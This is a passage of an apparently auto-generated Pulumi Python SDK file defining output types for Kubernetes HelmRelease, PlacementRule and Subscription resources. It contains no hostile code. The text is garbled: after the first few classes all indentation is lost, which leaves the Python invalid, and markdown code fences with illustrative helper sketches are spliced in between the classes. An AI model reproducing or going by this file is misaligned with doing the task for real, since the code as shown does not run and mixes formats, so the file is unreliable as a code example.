        return pulumi.get(self, "resource_version")

    @property
    @pulumi.getter
    def uid(self) -> Optional[str]:
        """
        UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
        """
        return pulumi.get(self, "uid")

    def _translate_property(self, prop):
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop


@pulumi.output_type
class HelmReleaseRepoSecretRef(dict):
    """
    Secret to use to access the helm-repo defined in the CatalogSource.
    """
    def __init__(__self__, *,
                 api_version: Optional[str] = None,
                 field_path: Optional[str] = None,
                 kind: Optional[str] = None,
                 name: Optional[str] = None,
                 namespace: Optional[str] = None,
                 resource_version: Optional[str] = None,
                 uid: Optional[str] = None):
        """
        Secret to use to access the helm-repo defined in the CatalogSource.
        :param str api_version: API version of the referent.
        :param str field_path: If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
        :param str kind: Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
        :param str name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
        :param str namespace: Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
        :param str resource_version: Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
        :param str uid: UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
        """
        if api_version is not None:
            pulumi.set(__self__, "api_version", api_version)
        if field_path is not None:
            pulumi.set(__self__, "field_path", field_path)
        if kind is not None:
            pulumi.set(__self__, "kind", kind)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if namespace is not None:
            pulumi.set(__self__, "namespace", namespace)
        if resource_version is not None:
            pulumi.set(__self__, "resource_version", resource_version)
        if uid is not None:
            pulumi.set(__self__, "uid", uid)

    @property
    @pulumi.getter(name="apiVersion")
    def api_version(self) -> Optional[str]:
        """
        API version of the referent.
        """
        return pulumi.get(self, "api_version")

    @property
    @pulumi.getter(name="fieldPath")
    def field_path(self) -> Optional[str]:
        """
        If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
        """
        return pulumi.get(self, "field_path")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def namespace(self) -> Optional[str]:
"""
Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
"""
return pulumi.get(self, "namespace")
@property
@pulumi.getter(name="resourceVersion")
def resource_version(self) -> Optional[str]:
"""
Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
"""
return pulumi.get(self, "resource_version")
@property
@pulumi.getter
def uid(self) -> Optional[str]:
"""
UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
return pulumi.get(self, "uid")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
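# The `_translate_property` helpers above map camelCase wire names to the
# snake_case Python attributes via a lookup table. The sketch below is an
# illustrative regex fallback, not the actual `_tables` module, showing the
# mapping that CAMEL_TO_SNAKE_CASE_TABLE encodes:

```python
import re

def camel_to_snake(prop: str) -> str:
    """Insert an underscore before each interior capital, then lowercase.

    Illustrates the mapping encoded by _tables.CAMEL_TO_SNAKE_CASE_TABLE,
    e.g. "resourceVersion" -> "resource_version".
    """
    return re.sub(r"(?<!^)(?=[A-Z])", "_", prop).lower()
```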
@pulumi.output_type
class HelmReleaseRepoSource(dict):
"""
Source holds the URL toward the helm-chart. (Scaffolding note: INSERT ADDITIONAL SPEC FIELDS - desired state of cluster. Important: run "operator-sdk generate k8s" to regenerate code after modifying this file. Add custom validation using kubebuilder tags: https://book-v1.book.kubebuilder.io/beyond_basics/generating_crd.html)
"""
def __init__(__self__, *,
github: Optional['outputs.HelmReleaseRepoSourceGithub'] = None,
helm_repo: Optional['outputs.HelmReleaseRepoSourceHelmRepo'] = None,
type: Optional[str] = None):
"""
Source holds the URL toward the helm-chart. (Scaffolding note: INSERT ADDITIONAL SPEC FIELDS - desired state of cluster. Important: run "operator-sdk generate k8s" to regenerate code after modifying this file. Add custom validation using kubebuilder tags: https://book-v1.book.kubebuilder.io/beyond_basics/generating_crd.html)
:param 'HelmReleaseRepoSourceGithubArgs' github: GitHub provides the parameters to access the helm-chart located in a github repo
:param 'HelmReleaseRepoSourceHelmRepoArgs' helm_repo: HelmRepo provides the urls to retrieve the helm-chart
:param str type: SourceTypeEnum: the type of the source
"""
if github is not None:
pulumi.set(__self__, "github", github)
if helm_repo is not None:
pulumi.set(__self__, "helm_repo", helm_repo)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def github(self) -> Optional['outputs.HelmReleaseRepoSourceGithub']:
"""
GitHub provides the parameters to access the helm-chart located in a github repo
"""
return pulumi.get(self, "github")
@property
@pulumi.getter(name="helmRepo")
def helm_repo(self) -> Optional['outputs.HelmReleaseRepoSourceHelmRepo']:
"""
HelmRepo provides the urls to retrieve the helm-chart
"""
return pulumi.get(self, "helm_repo")
@property
@pulumi.getter
def type(self) -> Optional[str]:
"""
SourceTypeEnum: the type of the source
"""
return pulumi.get(self, "type")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class HelmReleaseRepoSourceGithub(dict):
"""
GitHub provides the parameters to access the helm-chart located in a github repo
"""
def __init__(__self__, *,
branch: Optional[str] = None,
chart_path: Optional[str] = None,
urls: Optional[Sequence[str]] = None):
"""
GitHub provides the parameters to access the helm-chart located in a github repo
"""
if branch is not None:
pulumi.set(__self__, "branch", branch)
if chart_path is not None:
pulumi.set(__self__, "chart_path", chart_path)
if urls is not None:
pulumi.set(__self__, "urls", urls)
@property
@pulumi.getter
def branch(self) -> Optional[str]:
return pulumi.get(self, "branch")
@property
@pulumi.getter(name="chartPath")
def chart_path(self) -> Optional[str]:
return pulumi.get(self, "chart_path")
@property
@pulumi.getter
def urls(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "urls")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class HelmReleaseRepoSourceHelmRepo(dict):
"""
HelmRepo provides the urls to retrieve the helm-chart
"""
def __init__(__self__, *,
urls: Optional[Sequence[str]] = None):
"""
HelmRepo provides the urls to retrieve the helm-chart
"""
if urls is not None:
pulumi.set(__self__, "urls", urls)
@property
@pulumi.getter
def urls(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "urls")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
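# The two source variants above deserialize from dicts keyed by the camelCase
# names registered with @pulumi.getter. The shapes below are a hypothetical
# sketch: the "type" strings and URLs are illustrative placeholders, not
# confirmed enum values.

```python
# Hypothetical wire-format payloads that HelmReleaseRepoSource would accept.
github_source = {
    "type": "github",  # placeholder for a SourceTypeEnum value
    "github": {
        "urls": ["https://github.com/example/charts"],  # placeholder repo
        "branch": "main",
        "chartPath": "stable/mychart",
    },
}
helm_repo_source = {
    "type": "helmrepo",  # placeholder for a SourceTypeEnum value
    "helmRepo": {
        "urls": ["https://example.com/charts/mychart-0.1.0.tgz"],
    },
}
```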
@pulumi.output_type
class HelmReleaseStatus(dict):
def __init__(__self__, *,
conditions: Sequence['outputs.HelmReleaseStatusConditions'],
deployed_release: Optional['outputs.HelmReleaseStatusDeployedRelease'] = None):
pulumi.set(__self__, "conditions", conditions)
if deployed_release is not None:
pulumi.set(__self__, "deployed_release", deployed_release)
@property
@pulumi.getter
def conditions(self) -> Sequence['outputs.HelmReleaseStatusConditions']:
return pulumi.get(self, "conditions")
@property
@pulumi.getter(name="deployedRelease")
def deployed_release(self) -> Optional['outputs.HelmReleaseStatusDeployedRelease']:
return pulumi.get(self, "deployed_release")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class HelmReleaseStatusConditions(dict):
def __init__(__self__, *,
status: str,
type: str,
last_transition_time: Optional[str] = None,
message: Optional[str] = None,
reason: Optional[str] = None):
pulumi.set(__self__, "status", status)
pulumi.set(__self__, "type", type)
if last_transition_time is not None:
pulumi.set(__self__, "last_transition_time", last_transition_time)
if message is not None:
pulumi.set(__self__, "message", message)
if reason is not None:
pulumi.set(__self__, "reason", reason)
@property
@pulumi.getter
def status(self) -> str:
return pulumi.get(self, "status")
@property
@pulumi.getter
def type(self) -> str:
return pulumi.get(self, "type")
@property
@pulumi.getter(name="lastTransitionTime")
def last_transition_time(self) -> Optional[str]:
return pulumi.get(self, "last_transition_time")
@property
@pulumi.getter
def message(self) -> Optional[str]:
return pulumi.get(self, "message")
@property
@pulumi.getter
def reason(self) -> Optional[str]:
return pulumi.get(self, "reason")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
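# HelmReleaseStatus.conditions follows the common Kubernetes status-conditions
# shape (type, status, reason, message, lastTransitionTime). A generic lookup
# sketch over plain dicts, which here stand in for
# HelmReleaseStatusConditions values:

```python
def get_condition(conditions, cond_type):
    """Return the first condition whose "type" matches, or None.

    Generic sketch of the usual conditions-list access pattern; not part of
    the generated SDK.
    """
    for cond in conditions:
        if cond.get("type") == cond_type:
            return cond
    return None
```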
@pulumi.output_type
class HelmReleaseStatusDeployedRelease(dict):
def __init__(__self__, *,
manifest: Optional[str] = None,
name: Optional[str] = None):
if manifest is not None:
pulumi.set(__self__, "manifest", manifest)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def manifest(self) -> Optional[str]:
return pulumi.get(self, "manifest")
@property
@pulumi.getter
def name(self) -> Optional[str]:
return pulumi.get(self, "name")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class PlacementRuleSpec(dict):
"""
PlacementRuleSpec defines the desired state of PlacementRule
"""
def __init__(__self__, *,
cluster_conditions: Optional[Sequence['outputs.PlacementRuleSpecClusterConditions']] = None,
cluster_replicas: Optional[int] = None,
cluster_selector: Optional['outputs.PlacementRuleSpecClusterSelector'] = None,
clusters: Optional[Sequence['outputs.PlacementRuleSpecClusters']] = None,
policies: Optional[Sequence['outputs.PlacementRuleSpecPolicies']] = None,
resource_hint: Optional['outputs.PlacementRuleSpecResourceHint'] = None,
scheduler_name: Optional[str] = None):
"""
PlacementRuleSpec defines the desired state of PlacementRule
:param int cluster_replicas: number of replicas the Application wants
:param 'PlacementRuleSpecClusterSelectorArgs' cluster_selector: A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
:param Sequence['PlacementRuleSpecPoliciesArgs'] policies: Set Policy Filters
:param 'PlacementRuleSpecResourceHintArgs' resource_hint: Select Resource
:param str scheduler_name: schedulerName to use; defaults to the mcm controller. (Scaffolding note: INSERT ADDITIONAL SPEC FIELDS - desired state of cluster. Important: run "make" to regenerate code after modifying this file.)
"""
if cluster_conditions is not None:
pulumi.set(__self__, "cluster_conditions", cluster_conditions)
if cluster_replicas is not None:
pulumi.set(__self__, "cluster_replicas", cluster_replicas)
if cluster_selector is not None:
pulumi.set(__self__, "cluster_selector", cluster_selector)
if clusters is not None:
pulumi.set(__self__, "clusters", clusters)
if policies is not None:
pulumi.set(__self__, "policies", policies)
if resource_hint is not None:
pulumi.set(__self__, "resource_hint", resource_hint)
if scheduler_name is not None:
pulumi.set(__self__, "scheduler_name", scheduler_name)
@property
@pulumi.getter(name="clusterConditions")
def cluster_conditions(self) -> Optional[Sequence['outputs.PlacementRuleSpecClusterConditions']]:
return pulumi.get(self, "cluster_conditions")
@property
@pulumi.getter(name="clusterReplicas")
def cluster_replicas(self) -> Optional[int]:
"""
number of replicas the Application wants
"""
return pulumi.get(self, "cluster_replicas")
@property
@pulumi.getter(name="clusterSelector")
def cluster_selector(self) -> Optional['outputs.PlacementRuleSpecClusterSelector']:
"""
A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
"""
return pulumi.get(self, "cluster_selector")
@property
@pulumi.getter
def clusters(self) -> Optional[Sequence['outputs.PlacementRuleSpecClusters']]:
return pulumi.get(self, "clusters")
@property
@pulumi.getter
def policies(self) -> Optional[Sequence['outputs.PlacementRuleSpecPolicies']]:
"""
Set Policy Filters
"""
return pulumi.get(self, "policies")
@property
@pulumi.getter(name="resourceHint")
def resource_hint(self) -> Optional['outputs.PlacementRuleSpecResourceHint']:
"""
Select Resource
"""
return pulumi.get(self, "resource_hint")
@property
@pulumi.getter(name="schedulerName")
def scheduler_name(self) -> Optional[str]:
"""
schedulerName to use; defaults to the mcm controller. (Scaffolding note: INSERT ADDITIONAL SPEC FIELDS - desired state of cluster. Important: run "make" to regenerate code after modifying this file.)
"""
return pulumi.get(self, "scheduler_name")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class PlacementRuleSpecClusterConditions(dict):
"""
ClusterConditionFilter defines filter to filter cluster condition
"""
def __init__(__self__, *,
status: Optional[str] = None,
type: Optional[str] = None):
"""
ClusterConditionFilter defines filter to filter cluster condition
"""
if status is not None:
pulumi.set(__self__, "status", status)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def status(self) -> Optional[str]:
return pulumi.get(self, "status")
@property
@pulumi.getter
def type(self) -> Optional[str]:
return pulumi.get(self, "type")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class PlacementRuleSpecClusterSelector(dict):
"""
A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
"""
def __init__(__self__, *,
match_expressions: Optional[Sequence['outputs.PlacementRuleSpecClusterSelectorMatchExpressions']] = None,
match_labels: Optional[Mapping[str, str]] = None):
"""
A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
:param Sequence['PlacementRuleSpecClusterSelectorMatchExpressionsArgs'] match_expressions: matchExpressions is a list of label selector requirements. The requirements are ANDed.
:param Mapping[str, str] match_labels: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
"""
if match_expressions is not None:
pulumi.set(__self__, "match_expressions", match_expressions)
if match_labels is not None:
pulumi.set(__self__, "match_labels", match_labels)
@property
@pulumi.getter(name="matchExpressions")
def match_expressions(self) -> Optional[Sequence['outputs.PlacementRuleSpecClusterSelectorMatchExpressions']]:
"""
matchExpressions is a list of label selector requirements. The requirements are ANDed.
"""
return pulumi.get(self, "match_expressions")
@property
@pulumi.getter(name="matchLabels")
def match_labels(self) -> Optional[Mapping[str, str]]:
"""
matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
"""
return pulumi.get(self, "match_labels")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
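# The matchLabels docstring above states that each {key: value} pair is
# equivalent to a single-value "In" requirement in matchExpressions. An
# illustrative sketch of that rewrite (not part of the generated SDK):

```python
def labels_to_expressions(match_labels):
    """Rewrite matchLabels as the equivalent matchExpressions list: each
    {key: value} pair becomes an "In" requirement whose values array contains
    only that value."""
    return [
        {"key": key, "operator": "In", "values": [value]}
        for key, value in match_labels.items()
    ]
```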
@pulumi.output_type
class PlacementRuleSpecClusterSelectorMatchExpressions(dict):
"""
A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
"""
def __init__(__self__, *,
key: str,
operator: str,
values: Optional[Sequence[str]] = None):
"""
A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
:param str key: key is the label key that the selector applies to.
:param str operator: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
:param Sequence[str] values: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "operator", operator)
if values is not None:
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def key(self) -> str:
"""
key is the label key that the selector applies to.
"""
return pulumi.get(self, "key")
@property
@pulumi.getter
def operator(self) -> str:
"""
operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
"""
return pulumi.get(self, "operator")
@property
@pulumi.getter
def values(self) -> Optional[Sequence[str]]:
"""
values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
"""
return pulumi.get(self, "values")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
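# The selector docstrings above say matchLabels and matchExpressions are
# ANDed and an empty selector matches all objects. A simplified sketch of
# those semantics over plain dicts (not the controller's actual
# implementation):

```python
def matches_selector(labels, selector):
    """Evaluate a label selector against a label map.

    All matchLabels pairs and all matchExpressions requirements must hold
    (they are ANDed); an empty selector matches everything. Supports the
    four documented operators: In, NotIn, Exists, DoesNotExist.
    """
    for key, value in (selector.get("matchLabels") or {}).items():
        if labels.get(key) != value:
            return False
    for req in selector.get("matchExpressions") or []:
        key, op = req["key"], req["operator"]
        values = req.get("values") or []
        if op == "In" and labels.get(key) not in values:
            return False
        if op == "NotIn" and labels.get(key) in values:
            return False
        if op == "Exists" and key not in labels:
            return False
        if op == "DoesNotExist" and key in labels:
            return False
    return True
```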
@pulumi.output_type
class PlacementRuleSpecClusters(dict):
"""
GenericClusterReference - in alignment with kubefed
"""
def __init__(__self__, *,
name: str):
"""
GenericClusterReference - in alignment with kubefed
"""
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class PlacementRuleSpecPolicies(dict):
"""
ObjectReference contains enough information to let you inspect or modify the referred object. --- New uses of this type are discouraged because of difficulty describing its usage when embedded in APIs. 1. Ignored fields. It includes many fields which are not generally honored. For instance, ResourceVersion and FieldPath are both very rarely valid in actual usage. 2. Invalid usage help. It is impossible to add specific help for individual usage. In most embedded usages, there are particular restrictions like, "must refer only to types A and B" or "UID not honored" or "name must be restricted". Those cannot be well described when embedded. 3. Inconsistent validation. Because the usages are different, the validation rules are different by usage, which makes it hard for users to predict what will happen. 4. The fields are both imprecise and overly precise. Kind is not a precise mapping to a URL. This can produce ambiguity during interpretation and require a REST mapping. In most cases, the dependency is on the group,resource tuple and the version of the actual struct is irrelevant. 5. We cannot easily change it. Because this type is embedded in many locations, updates to this type will affect numerous schemas. Don't make new APIs embed an underspecified API type they do not control. Instead of using this type, create a locally provided and used type that is well-focused on your reference. For example, ServiceReferences for admission registration: https://github.com/kubernetes/api/blob/release-1.17/admissionregistration/v1/types.go#L533 .
"""
def __init__(__self__, *,
api_version: Optional[str] = None,
field_path: Optional[str] = None,
kind: Optional[str] = None,
name: Optional[str] = None,
namespace: Optional[str] = None,
resource_version: Optional[str] = None,
uid: Optional[str] = None):
"""
ObjectReference contains enough information to let you inspect or modify the referred object. --- New uses of this type are discouraged because of difficulty describing its usage when embedded in APIs. 1. Ignored fields. It includes many fields which are not generally honored. For instance, ResourceVersion and FieldPath are both very rarely valid in actual usage. 2. Invalid usage help. It is impossible to add specific help for individual usage. In most embedded usages, there are particular restrictions like, "must refer only to types A and B" or "UID not honored" or "name must be restricted". Those cannot be well described when embedded. 3. Inconsistent validation. Because the usages are different, the validation rules are different by usage, which makes it hard for users to predict what will happen. 4. The fields are both imprecise and overly precise. Kind is not a precise mapping to a URL. This can produce ambiguity during interpretation and require a REST mapping. In most cases, the dependency is on the group,resource tuple and the version of the actual struct is irrelevant. 5. We cannot easily change it. Because this type is embedded in many locations, updates to this type will affect numerous schemas. Don't make new APIs embed an underspecified API type they do not control. Instead of using this type, create a locally provided and used type that is well-focused on your reference. For example, ServiceReferences for admission registration: https://github.com/kubernetes/api/blob/release-1.17/admissionregistration/v1/types.go#L533 .
:param str api_version: API version of the referent.
:param str field_path: If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
:param str kind: Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
:param str name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
:param str namespace: Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
:param str resource_version: Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#concurrency-control-and-consistency
:param str uid: UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
if api_version is not None:
pulumi.set(__self__, "api_version", api_version)
if field_path is not None:
pulumi.set(__self__, "field_path", field_path)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if name is not None:
pulumi.set(__self__, "name", name)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if resource_version is not None:
pulumi.set(__self__, "resource_version", resource_version)
if uid is not None:
pulumi.set(__self__, "uid", uid)
@property
@pulumi.getter(name="apiVersion")
def api_version(self) -> Optional[str]:
"""
API version of the referent.
"""
return pulumi.get(self, "api_version")
@property
@pulumi.getter(name="fieldPath")
def field_path(self) -> Optional[str]:
"""
If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
"""
return pulumi.get(self, "field_path")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def namespace(self) -> Optional[str]:
"""
Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
"""
return pulumi.get(self, "namespace")
@property
@pulumi.getter(name="resourceVersion")
def resource_version(self) -> Optional[str]:
"""
Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#concurrency-control-and-consistency
"""
return pulumi.get(self, "resource_version")
@property
@pulumi.getter
def uid(self) -> Optional[str]:
"""
UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
return pulumi.get(self, "uid")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class PlacementRuleSpecResourceHint(dict):
"""
Select Resource
"""
def __init__(__self__, *,
order: Optional[str] = None,
type: Optional[str] = None):
"""
Select Resource
:param str order: SelectionOrder is the type for Nodes
:param str type: ResourceType defines types can be sorted
"""
if order is not None:
pulumi.set(__self__, "order", order)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def order(self) -> Optional[str]:
"""
SelectionOrder is the type for Nodes
"""
return pulumi.get(self, "order")
@property
@pulumi.getter
def type(self) -> Optional[str]:
"""
ResourceType defines types can be sorted
"""
return pulumi.get(self, "type")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class PlacementRuleStatus(dict):
"""
PlacementRuleStatus defines the observed state of PlacementRule
"""
def __init__(__self__, *,
decisions: Optional[Sequence['outputs.PlacementRuleStatusDecisions']] = None):
"""
PlacementRuleStatus defines the observed state of PlacementRule
:param Sequence['PlacementRuleStatusDecisionsArgs'] decisions: Placement decisions made by the controller. (Scaffolding note: INSERT ADDITIONAL STATUS FIELD - define observed state of cluster. Important: run "make" to regenerate code after modifying this file.)
"""
if decisions is not None:
pulumi.set(__self__, "decisions", decisions)
@property
@pulumi.getter
def decisions(self) -> Optional[Sequence['outputs.PlacementRuleStatusDecisions']]:
"""
Placement decisions made by the controller. (Scaffolding note: INSERT ADDITIONAL STATUS FIELD - define observed state of cluster. Important: run "make" to regenerate code after modifying this file.)
"""
return pulumi.get(self, "decisions")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class PlacementRuleStatusDecisions(dict):
"""
PlacementDecision defines the decision made by controller
"""
def __init__(__self__, *,
cluster_name: Optional[str] = None,
cluster_namespace: Optional[str] = None):
"""
PlacementDecision defines the decision made by controller
"""
if cluster_name is not None:
pulumi.set(__self__, "cluster_name", cluster_name)
if cluster_namespace is not None:
pulumi.set(__self__, "cluster_namespace", cluster_namespace)
@property
@pulumi.getter(name="clusterName")
def cluster_name(self) -> Optional[str]:
return pulumi.get(self, "cluster_name")
@property
@pulumi.getter(name="clusterNamespace")
def cluster_namespace(self) -> Optional[str]:
return pulumi.get(self, "cluster_namespace")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpec(dict):
"""
SubscriptionSpec defines the desired state of Subscription
"""
def __init__(__self__, *,
channel: str,
hooksecretref: Optional['outputs.SubscriptionSpecHooksecretref'] = None,
name: Optional[str] = None,
overrides: Optional[Sequence['outputs.SubscriptionSpecOverrides']] = None,
package_filter: Optional['outputs.SubscriptionSpecPackageFilter'] = None,
package_overrides: Optional[Sequence['outputs.SubscriptionSpecPackageOverrides']] = None,
placement: Optional['outputs.SubscriptionSpecPlacement'] = None,
timewindow: Optional['outputs.SubscriptionSpecTimewindow'] = None):
"""
SubscriptionSpec defines the desired state of Subscription
:param 'SubscriptionSpecHooksecretrefArgs' hooksecretref: ObjectReference contains enough information to let you inspect or modify the referred object. --- New uses of this type are discouraged because of difficulty describing its usage when embedded in APIs. 1. Ignored fields. It includes many fields which are not generally honored. For instance, ResourceVersion and FieldPath are both very rarely valid in actual usage. 2. Invalid usage help. It is impossible to add specific help for individual usage. In most embedded usages, there are particular restrictions like, "must refer only to types A and B" or "UID not honored" or "name must be restricted". Those cannot be well described when embedded. 3. Inconsistent validation. Because the usages are different, the validation rules are different by usage, which makes it hard for users to predict what will happen. 4. The fields are both imprecise and overly precise. Kind is not a precise mapping to a URL. This can produce ambiguity during interpretation and require a REST mapping. In most cases, the dependency is on the group,resource tuple and the version of the actual struct is irrelevant. 5. We cannot easily change it. Because this type is embedded in many locations, updates to this type will affect numerous schemas. Don't make new APIs embed an underspecified API type they do not control. Instead of using this type, create a locally provided and used type that is well-focused on your reference. For example, ServiceReferences for admission registration: https://github.com/kubernetes/api/blob/release-1.17/admissionregistration/v1/types.go#L533 .
:param str name: To specify a single package in the channel
:param Sequence['SubscriptionSpecOverridesArgs'] overrides: For hub use only; specifies the overrides to apply when deploying to clusters
:param 'SubscriptionSpecPackageFilterArgs' package_filter: To specify more than one package in the channel
:param Sequence['SubscriptionSpecPackageOverridesArgs'] package_overrides: To provide flexibility to override package in channel with local input
:param 'SubscriptionSpecPlacementArgs' placement: For hub use only, to specify which clusters to go to
:param 'SubscriptionSpecTimewindowArgs' timewindow: Helps the user control when the subscription will take effect
"""
pulumi.set(__self__, "channel", channel)
if hooksecretref is not None:
pulumi.set(__self__, "hooksecretref", hooksecretref)
if name is not None:
pulumi.set(__self__, "name", name)
if overrides is not None:
pulumi.set(__self__, "overrides", overrides)
if package_filter is not None:
pulumi.set(__self__, "package_filter", package_filter)
if package_overrides is not None:
pulumi.set(__self__, "package_overrides", package_overrides)
if placement is not None:
pulumi.set(__self__, "placement", placement)
if timewindow is not None:
pulumi.set(__self__, "timewindow", timewindow)
@property
@pulumi.getter
def channel(self) -> str:
return pulumi.get(self, "channel")
@property
@pulumi.getter
def hooksecretref(self) -> Optional['outputs.SubscriptionSpecHooksecretref']:
"""
